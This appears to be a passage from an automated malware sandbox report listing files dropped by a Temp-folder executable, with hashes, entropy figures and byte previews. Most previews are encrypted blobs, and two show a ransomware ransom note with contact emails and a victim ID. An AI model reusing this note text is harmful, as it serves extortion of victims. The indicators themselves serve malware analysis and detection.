                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8431512302455255
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:SKZNvI/VEHB8YZl+pCsVBMixizvS3heHtEUJtcKgb8t/nMTo47bU09b8CZ:SKZ9YpSlwVTxaEyjJtcKgW+c09b8CZ
                                                                                                                                              MD5:F16B05CDF1DD076FC497529D304AFBBB
                                                                                                                                              SHA1:C972255616B96916C5F74915BB54AC92718DA79D
                                                                                                                                              SHA-256:6A6C446D540320626904010303D750A9202A83B9588CC83468EC9CEB19AFC5FD
                                                                                                                                              SHA-512:68F450E21BFEA587249E0BD658B2801E1436FAAA4C61D802AF13729ED54FB2AB9E6A4D39D7D198F4D0C77E4F88104219ECB3CE2AD95A2A4ADCFD4AF8B113FFAC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........?.;n&.<..?...E.]..S...2.7.V[H>mbm.P..D.cL.eh....^>.OK...L....^y..E?.h.i.(b.....|.u.........R......[..,mw.r...I[.R.KO.p..j$....a......L..R.\.(e.tO.?.....KWu........|.$.....;7.$.CY..L......6..<S.NF...V....f...`&9....H.J5h.*v.i...../.ZE[.d..R...54.....a.p.{.aB.(...L....Xj..2....e...H ....p..m =.L.^z.Rl...L...-{.T.Z..Ej.T.z-..DT..@..z[..W.#e..@.Z.7:.B.M{.*..[......Mv...yjB.....(..3..-.a.n.....&.)$<..0..3O...R..`.{ASz..zNy(.W"[.....Qv..D."~J.y.R=..re..s....Q......&.J............S..~..P.[..........Xe^........U.[.Z.j.c?#..Ik.H...q2.">...8......_.....[....k.{3.G.9..S.'..9......3M.....C8......8.b;.4.a.QLc..y.....^...xA......aJ\..."....:8...4.K...TA.?....m..\zY..5.|..Sih.w....O...7...!\...*.R.k....9e...;4Fa....R.C.K.3.. .F...V.X$~'......v...l)..Vx....)_......&.../. ..n.....l.'....}C........i ...[.dQd(.#`.).-..j{(...U..-.3<M..Z..r.o.F...oxm..+..........U.Bn5..8P,C..8f..{.c.j........<EF....'Y...Z...T..xR.z......!2o|0!...........m...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8431512302455255
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:SKZNvI/VEHB8YZl+pCsVBMixizvS3heHtEUJtcKgb8t/nMTo47bU09b8CZ:SKZ9YpSlwVTxaEyjJtcKgW+c09b8CZ
                                                                                                                                              MD5:F16B05CDF1DD076FC497529D304AFBBB
                                                                                                                                              SHA1:C972255616B96916C5F74915BB54AC92718DA79D
                                                                                                                                              SHA-256:6A6C446D540320626904010303D750A9202A83B9588CC83468EC9CEB19AFC5FD
                                                                                                                                              SHA-512:68F450E21BFEA587249E0BD658B2801E1436FAAA4C61D802AF13729ED54FB2AB9E6A4D39D7D198F4D0C77E4F88104219ECB3CE2AD95A2A4ADCFD4AF8B113FFAC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:........?.;n&.<..?...E.]..S...2.7.V[H>mbm.P..D.cL.eh....^>.OK...L....^y..E?.h.i.(b.....|.u.........R......[..,mw.r...I[.R.KO.p..j$....a......L..R.\.(e.tO.?.....KWu........|.$.....;7.$.CY..L......6..<S.NF...V....f...`&9....H.J5h.*v.i...../.ZE[.d..R...54.....a.p.{.aB.(...L....Xj..2....e...H ....p..m =.L.^z.Rl...L...-{.T.Z..Ej.T.z-..DT..@..z[..W.#e..@.Z.7:.B.M{.*..[......Mv...yjB.....(..3..-.a.n.....&.)$<..0..3O...R..`.{ASz..zNy(.W"[.....Qv..D."~J.y.R=..re..s....Q......&.J............S..~..P.[..........Xe^........U.[.Z.j.c?#..Ik.H...q2.">...8......_.....[....k.{3.G.9..S.'..9......3M.....C8......8.b;.4.a.QLc..y.....^...xA......aJ\..."....:8...4.K...TA.?....m..\zY..5.|..Sih.w....O...7...!\...*.R.k....9e...;4Fa....R.C.K.3.. .F...V.X$~'......v...l)..Vx....)_......&.../. ..n.....l.'....}C........i ...[.dQd(.#`.).-..j{(...U..-.3<M..Z..r.o.F...oxm..+..........U.Bn5..8P,C..8f..{.c.j........<EF....'Y...Z...T..xR.z......!2o|0!...........m...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8646364156240995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Yxw90sR2NaARZ5rL1eY9vWB9of+enj2if3GW3ipqzlJiNAxMSkB/QUwRW:Yxw9Hs1Zo3ot32LpGlEa9aIU0W
                                                                                                                                              MD5:6689CE24461CA10C7F342E305740F188
                                                                                                                                              SHA1:A2FF704EF7AF6E1238084748E1E1175647D08CBB
                                                                                                                                              SHA-256:F453C61154417AC2DAED99A431884A9A3D71F81EA4ED8C33FC9F1C02C66C9570
                                                                                                                                              SHA-512:2AF46B5EAF12EF4AC1973D3EA5AA754EA003D44E2BBD8DC52881A4F2130D5E7F526985A5345E53A25B708FDF9D8025C6901ECAF091107D81474CB8B3CA4D28A2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...D...z...D.!..x.d..E....5.t..NIG.40..'...O...-.wC...9I.pe..B.V.}..g....L.`Y7._....7..@.....w.]....Ao..9.s.z....|.M.i.rx2x......`...(DL....|XG.v..k.H...(w.......O6............c.....^e.&.7..XiT..o.....NCV..,....+...c1..A..T...jU...}..a.38mS...S......-%..l..'+\.c.FO.........C>...1T.~~...l..`...zK..@....KQ..U\%[4)..{..H..X...I..Wa........$..*..-....V..!.d.7.....d..'A..J.8.M.{.....?....\u..A.....@...a...FuU.^......O...V<..].....\...F. .hp.O....!..wM..>..I`OD......B.qo}....m.I:.+...O..;T.D...w........"kr.....na2\....&.p.tKk~=..n.Q..##.....]y..a...s....'...j.()/U..a.........A.P........0m*.;..q{0..iT,o~2@.S...../..4....A...zKk.m..$C.J_..S.]....K-.=au.z.z..&529*....><8....f..`/."..>....w...cZ.d..b>+%...>.$....u..88\.]..y./.;L.a{.mvW.mN\p.rv.lC.AX o.i,:@.W.....)b|......j.d...\b7qm.6W.z@}2.E....QN.OYH..t.&...&e.08a.....N/.,.*..........'.'......H..r..KRq.2.3.;.*..6s}.*P_........lq....y.Kv..s.......X..sj7...FU.xb.........O*.Q...2.Q....2R..Y........~.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8646364156240995
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Yxw90sR2NaARZ5rL1eY9vWB9of+enj2if3GW3ipqzlJiNAxMSkB/QUwRW:Yxw9Hs1Zo3ot32LpGlEa9aIU0W
                                                                                                                                              MD5:6689CE24461CA10C7F342E305740F188
                                                                                                                                              SHA1:A2FF704EF7AF6E1238084748E1E1175647D08CBB
                                                                                                                                              SHA-256:F453C61154417AC2DAED99A431884A9A3D71F81EA4ED8C33FC9F1C02C66C9570
                                                                                                                                              SHA-512:2AF46B5EAF12EF4AC1973D3EA5AA754EA003D44E2BBD8DC52881A4F2130D5E7F526985A5345E53A25B708FDF9D8025C6901ECAF091107D81474CB8B3CA4D28A2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...D...z...D.!..x.d..E....5.t..NIG.40..'...O...-.wC...9I.pe..B.V.}..g....L.`Y7._....7..@.....w.]....Ao..9.s.z....|.M.i.rx2x......`...(DL....|XG.v..k.H...(w.......O6............c.....^e.&.7..XiT..o.....NCV..,....+...c1..A..T...jU...}..a.38mS...S......-%..l..'+\.c.FO.........C>...1T.~~...l..`...zK..@....KQ..U\%[4)..{..H..X...I..Wa........$..*..-....V..!.d.7.....d..'A..J.8.M.{.....?....\u..A.....@...a...FuU.^......O...V<..].....\...F. .hp.O....!..wM..>..I`OD......B.qo}....m.I:.+...O..;T.D...w........"kr.....na2\....&.p.tKk~=..n.Q..##.....]y..a...s....'...j.()/U..a.........A.P........0m*.;..q{0..iT,o~2@.S...../..4....A...zKk.m..$C.J_..S.]....K-.=au.z.z..&529*....><8....f..`/."..>....w...cZ.d..b>+%...>.$....u..88\.]..y./.;L.a{.mvW.mN\p.rv.lC.AX o.i,:@.W.....)b|......j.d...\b7qm.6W.z@}2.E....QN.OYH..t.&...&e.08a.....N/.,.*..........'.'......H..r..KRq.2.3.;.*..6s}.*P_........lq....y.Kv..s.......X..sj7...FU.xb.........O*.Q...2.Q....2R..Y........~.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8256584941994936
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:mJH1Z4fr/btqNFqxeIwco8nyS9Z3Hgp+EJThPfCnKel/0eCoByzBsN:mP6rztKFqxpKSP90TJfCntlsoBgBsN
                                                                                                                                              MD5:CB73036518617DA7A94A217C5266FB8A
                                                                                                                                              SHA1:39F8E867FB6C7663382E1C311518C3EDD10E67F8
                                                                                                                                              SHA-256:1004FDC54CD76CCD8FB8B45EF73F6AB9E4640B8F1D7BA88858F58D9FB033DF5D
                                                                                                                                              SHA-512:FE07B300719F3F2F183E2E384C7C34B2091BEC065071D246E8733EA020DA39EB23C6E4602FF9D2CB4B7E1C9E529CDD8210ABEAF4929FBF916338B27FAF1C9670
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:^...4...X.....g...|gu...X..}.......B.:..2...6....\I.C......k...\.q:.;..W...c.Oav...A*6Ww.r.|n.F..Y.u....Ul.....]g....M..Nt.<w.&....+R}.ki1.;..H....B..LZg..nW0}....t=.G&.B|........k<HF.Z...D@)..m.3z...M.....K+..w..|3.=..&{d6....$.K.;W....HSo>...c......j.........S.m.lZC......=.)...L(......`l.V&.s)..,K!q7..;$ISf)..wQ.L......B.8...k.s*.pl..L..S"x..&.a6.Yx3....$.{......|9.6.C.....y.2.*..t...*...0@...B........GZ..l..<...6..U..Y..n..e.'....9..s4W.u9.+.w..!.b...........\ 7y......j<.0lV...*?...T....I../L.DB...s...8T....,.e..0Z.m.S......IDAl.....k.,c"R.=>...4....:-..x9.I.,.Cv..Je..C..8Q....-.'.>...!l..[N\G...\.....mX.W..#F.j-.....r..l..l..X...D..eO..'{.Gw..../.Xwy/.....!...Z..V........Gp;.'$9U.8.p......2.2y.f.....;x.....c.H..\...N7B...F....4.4...+e.........{J...PG...r-.,..p.~.u9w.$[&.t..fi...g.d7..c..z.6.H+qw.I<H.Gp.S$.. .......g....|........`.H..x ,.c9D).$!..1rf6. )G...:r.~.,..h..3r|...p.op...iy....1...Hc.~...[..m:Kew.[..C..$.hz.c..z.`.E].p....A9
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8256584941994936
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:mJH1Z4fr/btqNFqxeIwco8nyS9Z3Hgp+EJThPfCnKel/0eCoByzBsN:mP6rztKFqxpKSP90TJfCntlsoBgBsN
                                                                                                                                              MD5:CB73036518617DA7A94A217C5266FB8A
                                                                                                                                              SHA1:39F8E867FB6C7663382E1C311518C3EDD10E67F8
                                                                                                                                              SHA-256:1004FDC54CD76CCD8FB8B45EF73F6AB9E4640B8F1D7BA88858F58D9FB033DF5D
                                                                                                                                              SHA-512:FE07B300719F3F2F183E2E384C7C34B2091BEC065071D246E8733EA020DA39EB23C6E4602FF9D2CB4B7E1C9E529CDD8210ABEAF4929FBF916338B27FAF1C9670
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:^...4...X.....g...|gu...X..}.......B.:..2...6....\I.C......k...\.q:.;..W...c.Oav...A*6Ww.r.|n.F..Y.u....Ul.....]g....M..Nt.<w.&....+R}.ki1.;..H....B..LZg..nW0}....t=.G&.B|........k<HF.Z...D@)..m.3z...M.....K+..w..|3.=..&{d6....$.K.;W....HSo>...c......j.........S.m.lZC......=.)...L(......`l.V&.s)..,K!q7..;$ISf)..wQ.L......B.8...k.s*.pl..L..S"x..&.a6.Yx3....$.{......|9.6.C.....y.2.*..t...*...0@...B........GZ..l..<...6..U..Y..n..e.'....9..s4W.u9.+.w..!.b...........\ 7y......j<.0lV...*?...T....I../L.DB...s...8T....,.e..0Z.m.S......IDAl.....k.,c"R.=>...4....:-..x9.I.,.Cv..Je..C..8Q....-.'.>...!l..[N\G...\.....mX.W..#F.j-.....r..l..l..X...D..eO..'{.Gw..../.Xwy/.....!...Z..V........Gp;.'$9U.8.p......2.2y.f.....;x.....c.H..\...N7B...F....4.4...+e.........{J...PG...r-.,..p.~.u9w.$[&.t..fi...g.d7..c..z.6.H+qw.I<H.Gp.S$.. .......g....|........`.H..x ,.c9D).$!..1rf6. )G...:r.~.,..h..3r|...p.op...iy....1...Hc.~...[..m:Kew.[..C..$.hz.c..z.`.E].p....A9
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.873913946392818
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:yNSAYhYPoV4NiQlFg75Ul9uKdp2b5kmK1tua/m+XUvJpY6xVRXsRg8K:y7YMohig75Ul9uKdpyUB/fUr5Ug/
                                                                                                                                              MD5:57CB272628AE87A1EB61005F8844B7DC
                                                                                                                                              SHA1:27E78F14AA24A9969C995EA4F74BEDE545D95F77
                                                                                                                                              SHA-256:B26B89694C01F8C726F01E32184F7896AE2BC89596F4962AB8CCA8DAD3A6DFE1
                                                                                                                                              SHA-512:EBE61DE70BE50D314B2F2CAD7B028C625BF466EB6A19A7FC91C9366D7BBE64E8662FA61D0C8B5707D3A20B83F6796D910A8D2EB4F7813D748A2E0F14B75935EF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...X.:..K...gp.W8..#........._j>zRQ2..Q......",.P...N. .F.el>.9f#.w.....B...dZa.H..o.1.. .t...p7.C./..cS6...D.g.E.......9O.J.].......r...#.P$i....'tc.M3..............T.....0yun..t......90.0.)'.........J.&.B.h.....h,.....}...W..[@.D....e.......X2.|f.7A....l.AWG..8.b.......,O.......3...a....sT;..W.UL...VVmT.#.D...G.........f......"A..;".eca..`9...uZ......&:...'....B{Po.....\..E.....P.g.../PQ.6.S%?.}>...&.....cF..ex...."9.......F..:..=....j.Vm.Dc.........GR...n...QnF@.o.hGt.p.....c...#.3R.!x.`...b..%........#fi.^Q{g....x ...2..|.oN$@.EXv.5.......u...l.[..w.a.S.._Ie. ?./V.`.2+%.k...H.~t.O..s@..........o..{X.^.Q.?.Uj.\{.,..u.2.6vE_<y....@.)..d+./..l..2N......(.&..y...e....= .I.o.z.J]'..;.k..G....t.!.5..KH...h..i......l.;..^..7Z._8..;S....oO.]A.../.9.)........BK..... ./.([......oN..N.?uN.?u.~.....|Y.f....l...?..s....F.<.'._{/....."..uu1.c.c0.]/YX.G..?..8....[m...4.ha..f..q.FI.[.T`..F. ..{q.lG...f.\$.=.&...w.rv...$m.i?....%..\Q..\.....-.I.I.S,.u
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.873913946392818
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:yNSAYhYPoV4NiQlFg75Ul9uKdp2b5kmK1tua/m+XUvJpY6xVRXsRg8K:y7YMohig75Ul9uKdpyUB/fUr5Ug/
                                                                                                                                              MD5:57CB272628AE87A1EB61005F8844B7DC
                                                                                                                                              SHA1:27E78F14AA24A9969C995EA4F74BEDE545D95F77
                                                                                                                                              SHA-256:B26B89694C01F8C726F01E32184F7896AE2BC89596F4962AB8CCA8DAD3A6DFE1
                                                                                                                                              SHA-512:EBE61DE70BE50D314B2F2CAD7B028C625BF466EB6A19A7FC91C9366D7BBE64E8662FA61D0C8B5707D3A20B83F6796D910A8D2EB4F7813D748A2E0F14B75935EF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...X.:..K...gp.W8..#........._j>zRQ2..Q......",.P...N. .F.el>.9f#.w.....B...dZa.H..o.1.. .t...p7.C./..cS6...D.g.E.......9O.J.].......r...#.P$i....'tc.M3..............T.....0yun..t......90.0.)'.........J.&.B.h.....h,.....}...W..[@.D....e.......X2.|f.7A....l.AWG..8.b.......,O.......3...a....sT;..W.UL...VVmT.#.D...G.........f......"A..;".eca..`9...uZ......&:...'....B{Po.....\..E.....P.g.../PQ.6.S%?.}>...&.....cF..ex...."9.......F..:..=....j.Vm.Dc.........GR...n...QnF@.o.hGt.p.....c...#.3R.!x.`...b..%........#fi.^Q{g....x ...2..|.oN$@.EXv.5.......u...l.[..w.a.S.._Ie. ?./V.`.2+%.k...H.~t.O..s@..........o..{X.^.Q.?.Uj.\{.,..u.2.6vE_<y....@.)..d+./..l..2N......(.&..y...e....= .I.o.z.J]'..;.k..G....t.!.5..KH...h..i......l.;..^..7Z._8..;S....oO.]A.../.9.)........BK..... ./.([......oN..N.?uN.?u.~.....|Y.f....l...?..s....F.<.'._{/....."..uu1.c.c0.]/YX.G..?..8....[m...4.ha..f..q.FI.[.T`..F. ..{q.lG...f.\$.=.&...w.rv...$m.i?....%..\Q..\.....-.I.I.S,.u
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.850089604899419
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:+OQgjPcq26lnvgb66lgRVa1Uakk/Sjlo8nb8gQmpXuFL8C/:+hcJs66KXa1Lrx8nQgFPC/
                                                                                                                                              MD5:2700C51DD6C1039F00B5FF34C4EF10CB
                                                                                                                                              SHA1:CDD554C877A9561802B13E3A064A6BF5FFB6AEA0
                                                                                                                                              SHA-256:88B965A33CC56F6B8F8A29679313B9E9FF496AC6867203EE92A634E2B1D59245
                                                                                                                                              SHA-512:0BACA6A212266BE97B984F23A744AE7FE1EE95B2848DCA8D519C1EFE1D05C7808711892457D918C881CBEEBF5A82511BD2AA6BB17155952870272840817A752B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.D.v..3h.!.bf......s.n.m......U$9.."....!2.!.....:....[.._n...Z/...]4E1.6....6.]..d..Av..cBD......*X......t.G..+.VU'....._..lY..1...MgB...h...P.....e....7..R.h.D..........+D..D..u.....I.8./W3.9..:...].S....Z..}.GG.[o..N.dM.Ud/....o...W.v....R.)......`.\.b....>g7..SH.......mN.q ...".."....6x[E....?.%pu.h..3.....>%.?..+..Q"(_..Y.2.!......./.T.<...Q?z.SZ.S.HJ.......<...v...../. rL...'..IZ:...".4..D.2...&fHc]\V.8.Q..........'bt.X...........4...mx.2.7.LB.J.a.....F...PeF.t.ESn.....G...........l.N.Kk..C..Z.#..n..^.....A.s..L1.dm\..yC.P.L..,MYxVd.0!......P...+8..&e,.....sz.3.T0...b.C..W...+/3.z..W....\..I.&....4.+..z....E..l.K.....V......'.....R[......R$8...-...........j....E..A... 0.}b....)v.%.......Ol......h.R2I.v..(..~...........L.5L...D...g.;......Hi?]~..g..(.<..yw..S.D'......Y|.[......7..v....>..;X.=...z....Qu .+...)M.).\.M...]6..#~U....l.&.~.X....'V...V..3..Y.k.%.S-0......p....c.A.....mJ..,...H.;.$../..mKG....A...RPR...f..=Q....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.850089604899419
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:+OQgjPcq26lnvgb66lgRVa1Uakk/Sjlo8nb8gQmpXuFL8C/:+hcJs66KXa1Lrx8nQgFPC/
                                                                                                                                              MD5:2700C51DD6C1039F00B5FF34C4EF10CB
                                                                                                                                              SHA1:CDD554C877A9561802B13E3A064A6BF5FFB6AEA0
                                                                                                                                              SHA-256:88B965A33CC56F6B8F8A29679313B9E9FF496AC6867203EE92A634E2B1D59245
                                                                                                                                              SHA-512:0BACA6A212266BE97B984F23A744AE7FE1EE95B2848DCA8D519C1EFE1D05C7808711892457D918C881CBEEBF5A82511BD2AA6BB17155952870272840817A752B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.D.v..3h.!.bf......s.n.m......U$9.."....!2.!.....:....[.._n...Z/...]4E1.6....6.]..d..Av..cBD......*X......t.G..+.VU'....._..lY..1...MgB...h...P.....e....7..R.h.D..........+D..D..u.....I.8./W3.9..:...].S....Z..}.GG.[o..N.dM.Ud/....o...W.v....R.)......`.\.b....>g7..SH.......mN.q ...".."....6x[E....?.%pu.h..3.....>%.?..+..Q"(_..Y.2.!......./.T.<...Q?z.SZ.S.HJ.......<...v...../. rL...'..IZ:...".4..D.2...&fHc]\V.8.Q..........'bt.X...........4...mx.2.7.LB.J.a.....F...PeF.t.ESn.....G...........l.N.Kk..C..Z.#..n..^.....A.s..L1.dm\..yC.P.L..,MYxVd.0!......P...+8..&e,.....sz.3.T0...b.C..W...+/3.z..W....\..I.&....4.+..z....E..l.K.....V......'.....R[......R$8...-...........j....E..A... 0.}b....)v.%.......Ol......h.R2I.v..(..~...........L.5L...D...g.;......Hi?]~..g..(.<..yw..S.D'......Y|.[......7..v....>..;X.=...z....Qu .+...)M.).\.M...]6..#~U....l.&.~.X....'V...V..3..Y.k.%.S-0......p....c.A.....mJ..,...H.;.$../..mKG....A...RPR...f..=Q....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.848207136401957
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:M4X6jkIKTO4DS5qqjN4GAKQtNm/yM28hp3HYJLcGzXqmlag1+TBpCLuVw:9K9KTO+SNrAKWJh8f52XbPgBsLj
                                                                                                                                              MD5:7D1F3E97E28ECD7771E6C443F5592C58
                                                                                                                                              SHA1:CFE5B61435685120B65EE1CCC2BDD648B7F00998
                                                                                                                                              SHA-256:F439FC85D9B24DF1E5D1F06C185BC784224838A12071825BC26C1AAA546F2FAC
                                                                                                                                              SHA-512:58C827AD1C94ECF668154307A47ED59D3668F1BB3E5DFFE755CDC267282342360FAF33C0673F05BA2529E58682CED671053E48CB150F0A30C7274610A8B49177
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.c......+r.M\,...=.....h..}.z....)...i....].N.O...:..K.T..?.KV..r..z..O...z..b~.j.....T......a*,........l.w...?....).ZM..V.H....C.-h......c.Bd...>.:...TE...q+Z=gv<..y..u2.O7CSd{.iC..u.y.......Q]..&.H.....>..8....q.&P).%!..H."..?x[.r.,m...#q..E.C...Gg..N.@..jkt.=...O.+...Js&....U....u.mI)...#2b..q.nO....1....75'. ..p-...^&c.......&..P.....Sr&...)oS..A.M.x.sd.=.O..[....X.6...3.k$3..b...!.f<1..F.j.HD.p0%......9...O)..uV.....o.....ZttX...k'#6qVU>C........'mo.DLHu`.R....."N.....~#N.8s...I.7f...d.i....?~..$c^!.{.....Z.u.9$`bNF.L.....<20.U.<.-.P.M....-g."A....JMX....%o....WF.Y..m..1...Z)..`...+....T...;.HZ...I.hRX..!.`..M....#ys>+o....R....)...s..saNQ..}'...f..^....f..+.......;(6Y......VN.<5l.p.&.'d...v='.u..-\....F8.q5.i9%.5....IXCy...x...cX.*;.S@....M......T/?.'...j}.P~Gg.5.=..+...q..;.zH...`._3o:41|.zb#.w...n].?..]..Y.....:..|t..:m.K..B.9......4H.N.oG.A...:`.........G.y....er..Q?.....9..^g.;....$..D.r..V.<.{.0.t.......D<.ykM.P....]^Y..7.J;
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.848207136401957
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:M4X6jkIKTO4DS5qqjN4GAKQtNm/yM28hp3HYJLcGzXqmlag1+TBpCLuVw:9K9KTO+SNrAKWJh8f52XbPgBsLj
                                                                                                                                              MD5:7D1F3E97E28ECD7771E6C443F5592C58
                                                                                                                                              SHA1:CFE5B61435685120B65EE1CCC2BDD648B7F00998
                                                                                                                                              SHA-256:F439FC85D9B24DF1E5D1F06C185BC784224838A12071825BC26C1AAA546F2FAC
                                                                                                                                              SHA-512:58C827AD1C94ECF668154307A47ED59D3668F1BB3E5DFFE755CDC267282342360FAF33C0673F05BA2529E58682CED671053E48CB150F0A30C7274610A8B49177
                                                                                                                                              Malicious:false
